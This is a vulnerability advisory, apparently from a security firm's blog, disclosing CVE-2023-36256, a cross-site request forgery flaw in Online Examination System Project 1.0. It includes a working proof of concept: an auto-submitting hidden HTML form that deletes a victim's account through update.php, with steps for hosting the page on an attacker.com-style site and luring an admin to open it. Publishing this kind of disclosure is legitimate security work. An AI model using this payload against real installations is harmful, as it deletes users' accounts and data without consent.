HomeAbout UsProducts
GEOINT - AI-Powered Geo Intelligence Platformpawnd — exploit development & memory triage
BlogOur Services
Automotive Security TestingIoT & Firmware TestingUAV & Drone SecurityWeb & Mobile Security
Trainings
Linux Usermode Exploitation 101
Contact
BLOG

CVE-2023-36256: Online Examination System Project 1.0 – Cross-site request forgery (CSRF)

June 13, 2023 ·

Blog / Blog

Affected Product

Online Examination System Project

Affected version

1.0

CVE ID

CVE-2023-36256

Vulnerability Type

Cross-site request forgery (CSRF)

Type

WEBAPPS

Description

The Online Examination System Project 1.0 version is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in a loss of data.

Proof of Concept

To exploit this vulnerability, an attacker needs to do the following:

  1. Identify the URL of the target application where the Online Examination System Project is installed. For example, http://example.com/
  2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
  3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:
<html>
  <body>
    <form action="http://example.com/update.php" method="GET">
      <input type="hidden" name="demail" value="victim@example.com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html

  1. Send the URL of the HTML page to the admin user via email, social media, or any other means.

If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

References

EDB-ID

  • 51511

Exploit

Vendor Homepage

Software Link

CVE-2023-36256
← Previous

CVE-2020-29168: Online Doctor Appointment Booking System PHP and Mysql 1.0 – ‘q’ SQL Injection

Next →

CVE-2023-37152: Online Art gallery project 1.0 – Arbitrary File Upload (Unauthenticated)

Access from the European Union/UK is restricted

This system is not offered to EU, UK, or EEA users.

This system is a non-EU research prototype and is not offered to individuals or entities within the European Union, United Kingdom, or European Economic Area. No services are provided to users in these jurisdictions, and no personal data from EU/UK/EEA data subjects is intended to be processed.